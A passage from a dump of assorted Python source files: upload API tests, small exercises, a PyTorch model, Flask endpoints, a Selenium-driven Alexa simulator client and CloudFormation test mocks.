self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFileType)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_non_quadratic_image(self):\n filepath = app.config['UPLOAD_FOLDER'] + 'non_quadratic.png'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'non_quadratic.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.ImageMustBeQuadratic)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_valid_image(self):\n \"\"\"A request with valid images should work.\"\"\"\n filepath = app.config['UPLOAD_FOLDER'] + 'valid_image.png'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'valid.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n assert 'message' in data\n assert 'filename' in data\n self.assertEqual(data['message'], 'Image uploaded successfully.')\n assert data['filename'].endswith('png')\n path = os.path.join(app.config['UPLOAD_FOLDER'], data['filename'])\n self.assertTrue(os.path.isfile(path))\n upload = Upload.query.filter_by(filename=data['filename']).first()\n self.assertTrue(upload)\n self.assertEqual(upload.filename, data['filename'])\n self.assertEqual(upload.admin_id, 1)\n # Delete the created file from the upload folder\n os.remove(path)\n","sub_path":"tests/test_api_upload.py","file_name":"test_api_upload.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"137221010","text":"import pygame\n\npygame.init() # 초기화 작업 (반드시 필요)\n\n# 화면 크기 설정\nscreen_width = 480 # 가로 크기\nscreen_height = 640 # 세로 크기\nscreen = pygame.display.set_mode((screen_width, screen_height)) # 화면 크기 설정\n\n# 화면 타이틀 설정\npygame.display.set_caption(\"Heeya Game\") # 게임 이름\n\n# 이벤트 루프 (이걸 해야 게임창이 계속 켜져 있는다)\nrunning = True # 게임이 진행중이가?\nwhile running:\n for event in pygame.event.get(): # 어떤 이벤트가 발생하였는가?\n if event.type == pygame.QUIT: # 창이 닫히는 이벤트가 발생하였는가?\n running = False # 게임이 진행중이 아님\n\n# pygame 종료\npygame.quit()\n","sub_path":"1_create_frame.py","file_name":"1_create_frame.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"449451004","text":"# -*- coding: utf-8 -*-\n\"\"\"\nСоздать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.\nОпределить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.\nВыполнить подсчет средней величины дохода сотрудников.\n\"\"\"\n\n\ndef salary_analyze(file_path, salary_thr=20000.0):\n \"\"\"\n Filter list of employees with salary threshold and calculate average salary\n :param file_path: path to file\n :param salary_thr: salary_threshold float\n :return: tuple of list and float\n \"\"\"\n filtered_list = []\n salary_avr = 0\n items_count = 0\n try:\n with open(file_path, 'r') as f:\n for line in f:\n try:\n name, salary = line.split(':')\n salary = float(salary)\n salary_avr += salary\n items_count += 1\n if salary < salary_thr:\n filtered_list.append(name)\n except ValueError as err:\n print('Found some wrong data at line:', line, f'Error {err}')\n except Exception as err:\n print(err)\n salary_avr = salary_avr / items_count if items_count else 0\n return filtered_list, salary_avr\n\n\nif __name__ == '__main__':\n thr = 20000.0\n li, avr = salary_analyze('task3_tmp.txt', thr)\n if len(li):\n print(f'People, who has salary lower than {thr}:')\n for p in li:\n print('\\t', p)\n else:\n print(f'There are no one who has salary lower than {thr}:')\n\n print(f'Salary average is {avr}')\n","sub_path":"hw5/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"162169601","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# q01-searching-for-parts.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: cbaek +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/10/19 12:37:44 by cbaek #+# #+# #\n# Updated: 2020/10/19 12:51:16 by cbaek ### ########.fr #\n# #\n# **************************************************************************** #\n\n# 실전문제 - 부품 찾기 P.197.\n\n# 이진 탐색 소스코드 구현(반복문)\ndef binary_search(array, target, start, end):\n\twhile start <= end:\n\t\tmid = (start + end) // 2\n\t\t# 찾은 경우 중간점 인덱스 반환\n\t\tif array[mid] == target:\n\t\t\treturn mid\n\t\t# 중간점의 값보다 찾고자 하는 값이 작은 경우 왼쪽 확인\n\t\telif array[mid] > target:\n\t\t\tend = mid - 1\n\t\t# 중간점의 값보다 찾고자 하는 값이 큰 경우 오른쪽 확인\n\t\telse:\n\t\t\tstart = mid + 1\n\treturn None\n\n# N(가게의 부품 개수) 입력\nn = int(input())\n# 가게에 있는 전체 부품 번호를 공백으로 구분하여 입력\narray = list(map(int, input().split()))\narray.sort() # 이진 탐색을 수행하기 위해 사전에 정렬 수행\n# M(손님이 요청한 부품 개수) 입력\nm = int(input())\n# 손님이 확인 요청한 전체 부품 번호를 공백으로 구분하여 입력\nx = list(map(int, input().split()))\n\n# 손님이 확인 요청한 부품 번호를 하나씩 확인\nfor i in x:\n\t# 해당 부품이 존재하는지 확인\n\tresult = binary_search(array, i, 0, n - 1)\n\tif result != None:\n\t\tprint('yes', end=' ')\n\telse:\n\t\tprint('no', end=' ')\n\n# 결과\n# $ python codes/ch07/q01-searching-for-parts.py\n# 5\n# 8 3 7 9 2\n# 3\n# 5 7 9\n# no yes yes\n","sub_path":"codes/ch07/q01-searching-for-parts.py","file_name":"q01-searching-for-parts.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"653554642","text":"from torch.utils.data import Dataset, DataLoader\nfrom torch.optim.lr_scheduler import *\nimport torch.nn.functional as F\nfrom typing import List\nfrom torch import nn\nimport logging\nimport torch\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass DenseNet(nn.Module):\n\n def __init__(self,\n hidden_dims: List[int] = [100, 50], \n dropouts: List[float] = [0.2, 0.2],\n batch_norm: bool = False,\n verbose: bool = True,):\n \n super(DenseNet, self).__init__()\n \n self.hidden_dims = hidden_dims\n self.dropouts = dropouts\n self.batch_norm = batch_norm\n self.verbose = verbose\n self.model = None\n \n def build(self, \n input_size: int, \n output_size: int):\n \n if self.verbose:\n logger.info(\n f\"Building a DenseNet having input size {input_size}, output size {output_size},\"\n )\n logger.info(\n f\"layer sizes {self.hidden_dims}, and dropouts {self.dropouts}\"\n )\n \n self.model_list = []\n self.model_list.append(nn.Linear(input_size, self.hidden_dims[0]))\n if self.batch_norm:\n self.model_list.append(nn.BatchNorm1d(num_features=self.hidden_dims[0]))\n self.model_list.append(nn.LeakyReLU())\n if len(self.hidden_dims) > 1:\n if self.dropouts[0] > 0.0:\n self.model_list.append(nn.Dropout(self.dropouts[0]))\n for i in range(len(self.hidden_dims)-1):\n self.model_list.append(nn.Linear(self.hidden_dims[i], self.hidden_dims[i+1]))\n if self.batch_norm:\n self.model_list.append(nn.BatchNorm1d(num_features=self.hidden_dims[i+1]))\n self.model_list.append(nn.LeakyReLU())\n if self.dropouts[i+1] > 0.0:\n self.model_list.append(nn.Dropout(self.dropouts[i+1]))\n self.model_list.append(nn.Linear(self.hidden_dims[-1], output_size))\n self.model_list.append(nn.Sigmoid())\n self.model = nn.Sequential(*self.model_list)\n\n def forward(self, \n x: torch.FloatTensor):\n \n if self.model is None:\n raise OSError(f\"You must call DenseNet.build before using the model. Exiting.\")\n \n x = self.model(x)\n return x","sub_path":"geckoml/torch/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"620484981","text":"#!flask/bin/python\nfrom flask import Flask, jsonify\napp = Flask(__name__)\nimport sqlite3\nimport re\ndef restout(a):\n connection = sqlite3.connect('/home/maciek/Desktop/Zastepstwascrap/TEST3.db')#LOKALIZACJA BAZY DANYCH\n c = connection.cursor()\n klasa = a\n # klasyrest=klasa[0]+\" \"+klasa[::]\n klasa = klasa[0] + \" \" + klasa[1:]\n print(klasa)\n klasa=klasa+'%'\n c.execute(\"SELECT id FROM zastepstwa WHERE klasa LIKE (?)\", (klasa,))\n rows = c.fetchall()\n\n id=[]\n for i in rows:\n id.append(i[0])\n # nauczycielerest = []\n nauczycielerest = [{},{},{},{},{},{},{},{},{},{},{},{}]\n\n ogloszeniat=[{}]\n if(a==\"ogloszenia\"):\n c.execute('SELECT ogloszenia FROM ogloszenia')\n test = c.fetchall()[0][0]\n result = re.search('Inf', test)\n span = result.span(0)\n span = span[0]\n klasa = test[0:span]\n\n print(test)\n print(klasa)\n ogloszeniat[0]['ogloszenia']=klasa\n\n\n\n # result = re.search('Inf', ogloszeniat[0]['ogloszenia'])\n # span = result.span(0)\n # span = span[0]\n # klasa = ogloszeniat[0]['ogloszenia'][0:span]\n # print(span)\n # span = result.span(0)\n # span = span[0]\n # ogloszeniat[0]['ogloszenia']\n # return klasa\n return ogloszeniat\n # return c.fetchall()[0]\n\n print(id)\n a=0\n for i in id:\n c.execute(\"SELECT nauczycielzastepowany FROM zastepstwa WHERE id=?\", (i,))\n nauczycielzastepowany = c.fetchall()\n nauczycielerest[a]['nauczycielzastepowany'] = nauczycielzastepowany[0][0]\n\n c.execute(\"SELECT lekcja FROM zastepstwa WHERE id=?\", (i,))\n lekcja = c.fetchall()\n nauczycielerest[a]['lekcja'] = lekcja[0][0]\n\n\n c.execute(\"SELECT sala FROM zastepstwa WHERE id=?\", (i,))\n sala = c.fetchall()\n nauczycielerest[a]['sala'] = sala[0][0]\n\n\n # c.execute(\"SELECT data FROM zastepstwa WHERE id=x\"), (i,))\n\n c.execute(\"SELECT zastepca FROM zastepstwa WHERE id=?\", (i,))\n zastepca = c.fetchall()\n nauczycielerest[a]['zastepca'] = zastepca[0][0]\n\n c.execute(\"SELECT klasa FROM zastepstwa WHERE id=?\", (i,))\n klasa= c.fetchall()\n nauczycielerest[a]['klasa']=klasa[0][0]\n # klasat[a]['klasa'] = klasa[0][0]\n\n a=a+1\n return nauczycielerest\n\n@app.route('/zastepstwa/', methods=['GET'])#replace klasa to task_id\ndef get_klasa(klasa):\n a=klasa\n return jsonify(restout(a))\n\napp.run(\n host=app.config.get(\"HOST\", \"0.0.0.0\"),\n port=app.config.get(\"PORT\", 9000)\n)\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"restOut.py","file_name":"restOut.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"237852760","text":"# encoding=utf8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport pickle\nimport bs4\nimport copy\nimport json\nimport threading\nimport random\nfrom selenium.webdriver.chrome.options import Options\nSIM_URL = \"https://developer.amazon.com/alexa/console/ask/test/amzn1.ask.skill.a00d7304-d36b-4ae0-8352-dd7e8fbc5d79/development/en_US/\"\nCOOKIES = \"myCookies.json\"\nCOOKIES = json.load(open(COOKIES))\nACTIVE_SIMS = []\nALL_SIMS = []\nlock = threading.Lock()\nTHREADS = 3\nANSWERS = {}\nclass simulator(object):\n\t\"\"\"docstring for simulator\"\"\"\n\tdef login(self):\n\t\tself.tempLock.acquire()\n\t\tself.driver.get(SIM_URL)\n\t\tfor cookie in COOKIES:\n\t\t\tif cookie['domain'] == '.amazon.com':\n\t\t\t\tself.driver.add_cookie(cookie)\n\t\tself.driver.get(SIM_URL)\n\t\tself.tempLock.release()\n\n\tdef test_driver(self):\n\t\tself.tempLock.acquire()\n\t\tcount = 0\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").clear()\n\t\t\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(\"alexa what is the weather\")\n\t\t\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(Keys.ENTER)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tif count > 8:\n\t\t\t\tbreak\n\t\t\tcount += 1\n\t\t\ttime.sleep(3)\n\t\t\tself.driver.save_screenshot(\"{}.png\".format(random.randint(1, 50)))\n\t\tself.tempLock.release()\n\t\tif count > 8:\n\t\t\treturn False\n\t\treturn True\n\n\tdef get_response(self):\n\t\ttry:\n\t\t\tpage = bs4.BeautifulSoup(self.driver.page_source, 'lxml')\n\t\t\treturn page.select(\".askt-dialog__message--active-response\")[0].getText()\n\t\texcept:\n\t\t\treturn None\n\n\tdef ask_question(self, question):\n\t\tself.tempLock.acquire()\n\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").clear()\n\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(question)\n\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(Keys.ENTER)\n\t\tpage_source = self.driver.page_source\n\t\ta = 0\n\t\twhile \"askt-dialog__message askt-dialog__message--spinner\" in str(page_source):\n\t\t\tprint(\"Waiting on question: {} | Working: {} Active: {}\".format(question.replace(\"ask ncr store\", \"\"), len(ALL_SIMS)-len(ACTIVE_SIMS), len(ACTIVE_SIMS)))\n\t\t\ttime.sleep(.1)\n\t\t\tpage_source = self.driver.page_source\n\t\t\ta += 1\n\t\t\tif a > 100:\n\t\t\t\tbreak\n\t\tfor i in range(30):\n\t\t\tx = self.get_response()\n\t\t\tif x != None:\n\t\t\t\tANSWERS[question] = x\n\t\t\t\tself.tempLock.release()\n\t\t\t\treturn\n\t\t\ttime.sleep(.1)\n\t\tANSWERS[question] = \"I'm not really sure about that.\"\n\t\tself.tempLock.release()\n\t\treturn\n\n\tdef refresh_token(self):\n\t\twhile True:\n\t\t\ttime.sleep(random.randint(1, 10)*30)\n\t\t\tlock.acquire()\n\t\t\tself.tempLock.acquire()\n\t\t\tACTIVE_SIMS.append(self.id)\n\t\t\tlock.release()\n\t\t\tprint(\"Refreshing token\")\n\t\t\tself.driver.get(SIM_URL)\n\t\t\tif self.test_driver() == False:\n\t\t\t\tself.driver.quit()\n\t\t\t\tALL_SIMS.append(simulator())\n\t\t\telse:\n\t\t\t\tACTIVE_SIMS.remove(self.id)\n\t\t\tself.tempLock.release()\n\n\tdef __init__(self):\n\t\tself.tempLock = threading.Lock()\n\t\toptions = 
Options()\n\t\toptions.add_argument('--headless')\n\t\toptions.add_argument('--disable-gpu')\n\t\toptions.add_argument(\"--mute-audio\")\n\t\tself.id = ''.join([str(random.randint(1,9)) for i in range(10)])\n\t\tself.driver = webdriver.Chrome(chrome_options=options)\n\t\tself.driver.set_window_size(1920, 1080)\n\t\tself.login()\n\t\tif not self.test_driver():\n\t\t\traise Exception(\"Error on driver...\")\n\t\t# threading.Thread(target=self.refresh_token).start()\n\n\n\ndef create_driver():\n\ta = simulator()\n\tALL_SIMS.append(a)\n\ndef setup(threadCount=10):\n\tthread = [threading.Thread(target=create_driver) for i in range(threadCount)]\n\tfor t in thread:\n\t\tt.start()\n\tfor t in thread:\n\t\tt.join()\n\ndef ask_question(question):\n\t# Wait until a simulator is free, claim it, ask the question, then release it\n\tmySim = None\n\twhile mySim is None:\n\t\tlock.acquire()\n\t\tfor sim in ALL_SIMS:\n\t\t\tif sim.id not in ACTIVE_SIMS:\n\t\t\t\tACTIVE_SIMS.append(sim.id)\n\t\t\t\tmySim = sim\n\t\t\t\tbreak\n\t\tlock.release()\n\t\ttime.sleep(1)\n\tmySim.ask_question(question)\n\tACTIVE_SIMS.remove(mySim.id)\n\ndef ask_questions(listOfQuestions):\n\tthreads = [threading.Thread(target=ask_question, args=(arg,)) for arg in listOfQuestions]\n\tfor thread in threads:\n\t\tthread.start()\n\tfor thread in threads:\n\t\tthread.join()\n\treturn [{\"question\": question, \"answer\": ANSWERS[question]} for question in listOfQuestions]\n\nfrom flask import Flask, Response, request, jsonify\napp = Flask(__name__)\n\n@app.route('/interact', methods=['POST'])\ndef main():\n\tstart = time.time()\n\tquestions = request.form.getlist('question')\n\tresponse = ask_questions(questions)\n\tend = time.time()\n\treturn jsonify({\"response\": response, \"time\": end - start})\n\nif __name__ == \"__main__\":\n\tsetup(THREADS)\n\tapp.run(port=8001, threaded=True)\n\n","sub_path":"startVoice.py","file_name":"startVoice.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523038915","text":"import random\r\n\r\ndef random_list(length, a, b):\r\n\treturn [random.randint(a,b) for i in range(length)]\r\n\r\ndef comp_two_lists(list1, list2):\r\n\tlike = 0\r\n\tlike_tall = []\r\n\tfor i in list1:\r\n\t\tif i in list2:\r\n\t\t\tif i not in like_tall: #for å unngå kopier\r\n\t\t\t\tlike += 1\r\n\t\t\tlike_tall.append(i)\r\n\treturn like, like_tall\r\n\r\ndef comp_lists(list_of_lists):\r\n\twhile len(list_of_lists)>=2:\r\n\t\tlike, like_tall = comp_two_lists(list_of_lists[0], list_of_lists[1])\r\n\t\tlist_of_lists.pop(0)\r\n\t\tlist_of_lists[0] = like_tall\r\n\treturn like\r\n\r\ndef partall_rekke(list1):\r\n\trekke_liste = []\r\n\tlengde_rekke = 0 #teller sammenhengende rekke\r\n\tlist1.append(1) #koden er feil, så legger til et oddetall til slutt sånn at det funker #jalla\r\n\t\r\n\tfor i in range(len(list1)): \r\n\t\tif list1[i] % 2 == 0:\r\n\t\t\tlengde_rekke += 1\r\n\t\tif i>0:\r\n\t\t\tif not list1[i-1] % 2 == 0 and list1[i]%2==0: #betyr at vi er på starten av en ny partallsrekke\r\n\t\t\t\tstart_pos = i\r\n\t\tif i < len(list1) and list1[i] % 2 == 0:\r\n\t\t\tif not list1[i+1] % 2 == 0: #sjekker om neste tall er partall\r\n\t\t\t\trekke_liste.append((start_pos,lengde_rekke))\r\n\t\t\t\tlengde_rekke = 0\r\n\t\r\n\tlengste_rekke = 0\r\n\tfor rekker in rekke_liste:\r\n\t\tif rekker[1]>lengste_rekke:\r\n\t\t\tlengste_rekke = rekker[1]\r\n\t\t\tstart_pos = rekker[0]\r\n\ttry:\r\n\t\treturn start_pos,lengste_rekke\r\n\texcept:\r\n\t\treturn 'Ingen partall i rekke'\r\n\r\n\r\nprint(partall_rekke([1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9876543]))\r\n\r\n'''\r\nlist_of_lists = [random_list(10,0,5) for k in range(50)] #30 tilfeldige lister mellom 0 og 50 som er 50 lange]\r\nprint(list_of_lists)\r\nprint(comp_lists(list_of_lists))\r\n'''","sub_path":"tdt4110/Øving 7/sammenhengende_tallrekke.py","file_name":"sammenhengende_tallrekke.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"318483958","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 21 09:30:11 2018\n\n@author: p000495138\n\"\"\"\n\nfrom multiprocessing import Queue\nimport multiprocessing\nimport time\n\nclass Test1Worker(multiprocessing.Process):\n\n def __init__(self,interval,q):\n super(Test1Worker, self).__init__()\n self.interval = interval\n self.q = q\n \n def run(self):\n while True:\n time.sleep(self.interval)\n print(\"Test1Woker:QueuePut\") \n self.q.put((\"TEST1\",\"TEST2\"))\n\n\n\nclass Test2Worker(multiprocessing.Process):\n\n def __init__(self,q):\n super(Test2Worker, self).__init__()\n self.q = q\n \n def run(self):\n while True:\n data = self.q.get()\n print(\"Test2Woker:QueueReadValue\")\n print('Queue[0]:'+data[0])\n print('Queue[1]:'+data[1] )\n\n\ndef main():\n q = Queue()\n jobs = [\n Test1Worker(5,q),\n Test2Worker(q)\n ]\n for j in jobs:\n j.start()\n\nif __name__ == '__main__':\n main()","sub_path":"04_playground/13_multiprocess/d10_test_multiprocess7_classQueue.py","file_name":"d10_test_multiprocess7_classQueue.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"580454446","text":"def is_palindrome(s, init, end):\n\tr = reversed(s)\n\tif(list(r) == list(s)):\n\t\treturn True\n\treturn False\n\n\ntest_cases = int(input())\nfor i in range(test_cases):\n\tstring = input()\n\tif is_palindrome(string,0,len(string)-1):\n\t\tprint(\"YES\", end=' ')\n\t\tif(len(string)%2 == 0):\n\t\t\tprint(\"EVEN\")\n\t\telse:\n\t\t\tprint(\"ODD\")\n\n\telse:\n\t\tprint(\"NO\")\n\n","sub_path":"Python/is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"463919844","text":"import sys\r\nimport os\r\nfrom pygccxml import parser\r\n\r\nclass File:\r\n def __init__(self, header_files_drc, location_to_be_written_to , file_to_be_parsed):\r\n self._file_name = file_to_be_parsed\r\n self._file_directory = header_files_drc\r\n self._directory_to_be_written_to = location_to_be_written_to\r\n self._setEnvironment()\r\n self._makeHeaderNameCppName()\r\n\r\n def _setEnvironment(self):\r\n\r\n #gccxml_09_path = os.path.join('/', 'usr', 'bin', 'castxml') ---> CASTXML will be used for C++11 syntax.\r\n generator_path = os.path.join('/', 'usr', 'bin', 'castxml')\r\n generator_name = 'castxml'\r\n\r\n # Configure GCC-XML parser\r\n # config = parser.gccxml_configuration_t(\r\n # gccxml_path=gccxml_09_path, compiler='g++')\r\n xml_generator_config = parser.xml_generator_configuration_t(\r\n xml_generator_path = generator_path,\r\n xml_generator = generator_name,\r\n )\r\n\r\n #Location where sources files are stored and will be written.\r\n # headerFilesDirectory = os.path.join(currentModuleDirectoryPath, '..', 'headerFiles')\r\n # generatedFilesDirectory = os.path.join(currentModuleDirectoryPath, '..', 'generatedFiles')\r\n\r\n #The directory where header files reside.\r\n # self._file_directory = self._headerFilesDirectory + \"\\\\\"\r\n #Parsing source file\r\n self._decls = parser.parse([os.path.join(self._file_directory, self._file_name)], xml_generator_config)\r\n\r\n def _makeHeaderNameCppName(self):\r\n temp_name = self._file_name\r\n index = temp_name.find('.')\r\n temp_name = temp_name[:index]\r\n self._nameWithoutExt = temp_name\r\n temp_name = temp_name + \".cpp\"\r\n self._cppName = temp_name\r\n\r\n def returnGlobalDeclarations(self):\r\n return self._decls\r\n\r\n def returnFilePath(self):\r\n return os.path.join(self._file_directory, self._file_name)","sub_path":"cppGenerator/gccxmlEnv.py","file_name":"gccxmlEnv.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"312149342","text":"from bson.objectid import ObjectId\nimport sclhub.redis_request_handler\nimport sclhub.tools.user\nimport sclhub.tools.blog\n\nclass ProfileHandler(sclhub.redis_request_handler.RedisRequestHandler):\n\tredis = None\n\tloader = None\n\tmongo = None\n\n\tdef initialize(self, redis, loader, mongo):\n\t\tself.redis = redis\n\t\tself.loader = loader\n\t\tself.mongo = mongo\n\tdef get(self, user):\n\t\tuserp = sclhub.tools.user.User(user, self.redis, self.mongo)\n\t\tif userp.profile is not None:\n\t\t\tposts = sclhub.tools.blog.Tape(userp, self.redis, self.mongo)\n\t\t\tposts.load([userp.profile[\"username\"]])\n\t\t\tposts.init_comments(lim=4)\n\t\t\tposts_count = posts.count()\n\n\t\t\tcurrent_user = self.current_user\n\n\t\t\tfriendship = 0\n\t\t\tif (self.mongo.users.notifications.find_one({\"username\":user, \"friend_username\": current_user}) is not None\n\t\t\tor self.mongo.users.notifications.find_one({\"username\":current_user, \"friend_username\": user}) is not None):\n\t\t\t\tfriendship = 1\n\t\t\telif current_user in userp.profile[\"friends\"]:\n\t\t\t\tfriendship = 2\n\n\t\t\tonline_friends = userp.online_friends\n\t\t\tonline = []\n\t\t\tfor onl in online_friends:\n\t\t\t\tonl = onl.decode(\"utf-8\")\n\t\t\t\tif onl != self.current_user:\n\t\t\t\t\tonline_user = sclhub.tools.user.User(onl, None, self.mongo)\n\t\t\t\t\tonline.append(online_user.profile)\n\n\t\t\thtml = self.loader.load(\"index.html\").generate(\n\t\t\t\t\tposts=posts.get(), comment_label_format=self.comment_label_format,\n\t\t\t\t\tcurrent_user=self.current_user, friendship=friendship,\n\t\t\t\t\tprofile=sclhub.tools.user.User(self.current_user, None, self.mongo).profile, online=online, more=(True if posts.count() > posts.limit else False)\n\t\t\t\t)\n\n\t\t\tself.write(html)\n\t\telse:\n\t\t\tself.set_status(400)\n\tdef comment_label_format(self, count):\n\t\tif count == 0:\n\t\t\treturn \"Добавить ответ\"\n\t\telif count < 0:\n\t\t\treturn \"Скрыть ответы\"\n\t\telif count%10 == 1:\n\t\t\treturn \"Показать еще 1 ответ\"\n\t\telif count%10 >=2 and count%10 <=4:\n\t\t\treturn \"Показать еще {} ответа\".format(count)\n\t\telse:\n\t\t\treturn \"Показать еще {} ответов\".format(count)","sub_path":"sclhub/handlers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"580142465","text":"#\n# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or\n# its licensors.\n#\n# For complete copyright and license terms please see the LICENSE at the root of this\n# distribution (the \"License\"). All use of this software is governed by the License,\n# or, if provided, by the license below or the license accompanying this file. Do not\n# remove or modify any license notices. This file is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#\n# $Revision: #2 $\n\nimport dateutil\nimport json\nimport mock\nimport random\nimport unittest\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nimport stack_info\nimport mock_aws\nfrom errors import ValidationError\n\nMOCK_CLIENT = 'test-client'\n\nMOCK_REGION = 'test-region'\nMOCK_ACCOUNT_ID = 'test-account-id'\nMOCK_STACK_NAME = 'test-stack-name'\nMOCK_STACK_UUID = 'test-stack-uuid'\n\ndef make_stack_arn(stack_name):\n return 'arn:aws:cloudformation:{region}:{account}:stack/{name}/{uuid}'.format(\n region = MOCK_REGION,\n account = MOCK_ACCOUNT_ID,\n name = stack_name,\n uuid = MOCK_STACK_UUID)\n\nMOCK_STACK_ARN = make_stack_arn(MOCK_STACK_NAME)\n\nMOCK_LOGICAL_RESOURCE_ID = 'test-logical-resource-id'\nMOCK_PHYSICAL_RESOURCE_ID = 'test-physical-resource-id'\nMOCK_RESOURCE_TYPE = 'test-resource-type'\nMOCK_RESOURCE_STATUS = 'test-resource-status'\nMOCK_RESOURCE_STATUS_REASON = 'test-resource-status-reason'\nMOCK_RESOURCE_LAST_UPDATED_TIMESTAMP = '2011-06-21T20:15:58Z'\n\ndef make_resource_summary(\n physical_resource_id = MOCK_PHYSICAL_RESOURCE_ID, \n logical_resource_id = MOCK_LOGICAL_RESOURCE_ID, \n resource_type = MOCK_RESOURCE_TYPE, \n resource_status = MOCK_RESOURCE_STATUS,\n resource_status_reason = MOCK_RESOURCE_STATUS_REASON,\n last_updated_timestamp = MOCK_RESOURCE_LAST_UPDATED_TIMESTAMP):\n return {\n 'LogicalResourceId': logical_resource_id,\n 'PhysicalResourceId': physical_resource_id,\n 'ResourceType': resource_type,\n 'ResourceStatus': resource_status,\n 'ResourceStatusReason': resource_status_reason,\n 'LastUpdatedTimestamp': last_updated_timestamp\n }\n\ndef make_random_resource_summary():\n id = str(random.randint(100000, 999999))\n return make_resource_summary(\n physical_resource_id = 'test-physical-resource-id-' + id,\n logical_resource_id = 'test-logical-resource-id-' + id,\n resource_type = 'test-resource-type-' + id\n )\n\nMOCK_RESOURCE_SUMMARY = make_resource_summary()\n\nMOCK_RESOURCE_SUMMARY_LIST = [ MOCK_RESOURCE_SUMMARY ]\n\nMOCK_TEMPLATE = 'mock-template'\n\ndef make_list_stack_resources_response(resource_summary_list):\n return {\n 'StackResourceSummaries': resource_summary_list\n }\n\ndef make_template_with_stack_type(stack_type):\n return {\n \"Metadata\": {\n \"CloudCanvas\": {\n \"StackType\": stack_type\n }\n }\n }\n\ndef make_get_template_response(template):\n return {\n 'TemplateBody': json.dumps(template)\n }\n\ndef make_parameter(key, value):\n return {\n \"ParameterKey\": key,\n \"ParameterValue\": value\n }\n\nMOCK_PARAMETER_NAME = \"test-parameter-name\"\nMOCK_PARAMETER_VALUE = \"test-parameter-value\"\n\nMOCK_PARAMETER = make_parameter(MOCK_PARAMETER_NAME, MOCK_PARAMETER_VALUE)\n\nMOCK_PARAMETERS = [ MOCK_PARAMETER ]\n\nMOCK_STACK_TYPE = 'test-stack-type'\n\ndef make_stack_description(stack_type):\n return {\n \"Parameters\": [\n make_parameter(\"CloudCanvasStack\", stack_type)\n ]\n }\n\ndef make_describe_stacks_response(stack_description):\n return {\n \"Stacks\": [\n 
